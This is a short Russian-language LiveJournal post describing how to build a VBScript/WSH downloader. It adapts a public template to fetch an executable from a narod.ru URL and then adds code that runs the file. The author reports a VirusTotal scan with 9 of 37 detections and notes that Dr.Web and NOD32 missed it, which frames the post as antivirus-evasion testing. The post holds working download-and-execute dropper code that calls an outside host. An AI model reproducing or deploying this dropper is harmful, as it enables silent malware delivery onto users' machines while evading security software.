?

Log in

No account? Create an account

ewoke

держать спину прямо

Previous Entry Share Next Entry
(no subject)
ewoke


Проверяем, как реагируют анти на downloader, писаный на vbs/wsh.
Каркас берется отсюда http://paulsadowski.com/WSH/getremotebinaryfile.htm

Меняем начало на

ImageFile = "get_fs.exe"
DestFolder = ".\"
URL = "
http://dizzie.narod.ru/get_fs.exe"

Дописываем в конец

Set shell = CreateObject("WScript.Shell")
shell.Run "get_fs.exe"

Имеем http://www.virustotal.com/analisis/64d27e639f6e6a453ee051badadeaf0f
(9/37, Drweb и Nod в пролете)

Кто не испугался, получает иконку от экзешника в подарок)